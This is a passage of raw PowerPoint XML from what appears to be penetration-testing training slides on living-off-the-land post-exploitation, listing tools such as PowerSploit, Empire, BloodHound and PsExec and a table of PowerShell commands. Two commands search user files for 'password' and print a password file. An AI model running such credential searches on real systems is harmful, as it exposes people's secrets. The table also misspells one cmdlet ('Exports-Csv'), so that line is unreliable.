                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="993321"/>
            <a:ext cx="868212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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Using legitimate tools to perform post-exploitation activities is often referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>living-off-the-land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and, in some cases, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fileless malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fileless malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> refers to the idea that there is no need to install any additional software or binaries to the compromised system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Examples of living-off-the-land post-exploitation techniques include the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerShell for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and Empire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows Management Instrumentation for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows Remote Management (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36839143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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="993321"/>
            <a:ext cx="2977911"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rgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerShell for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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You can use PowerShell to get directory listings, copy and move files, get a list of running processes, and perform administrative tasks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="140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The table lists and describes some of the most useful PowerShell commands that can be used for post-exploitation tasks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3199DCD-4643-49C4-379B-963C86BB28A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841908067"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3040811" y="787160"/>
          <a:ext cx="5977904" cy="4175759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3252106">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2725798">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>PowerShell Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ChildItem</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>List directories</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Copy-Item sourceFile.doc destinationFile.doc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Copies a file (cp, copy, cpi)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Move-Item sourceFile.doc destinationFile.doc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Moves a file (mv, move, mi)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Select-String -path c:\users \*.txt -pattern password</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Finds text within a file</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-Content omar_s_passwords.txt</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prints the contents of a file</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-Location</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Gets the present directory</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-Process</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Gets a process listing</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-Service</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Gets a service listing</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3215492368"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Get-Process | Exports-Csv procs.csv</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
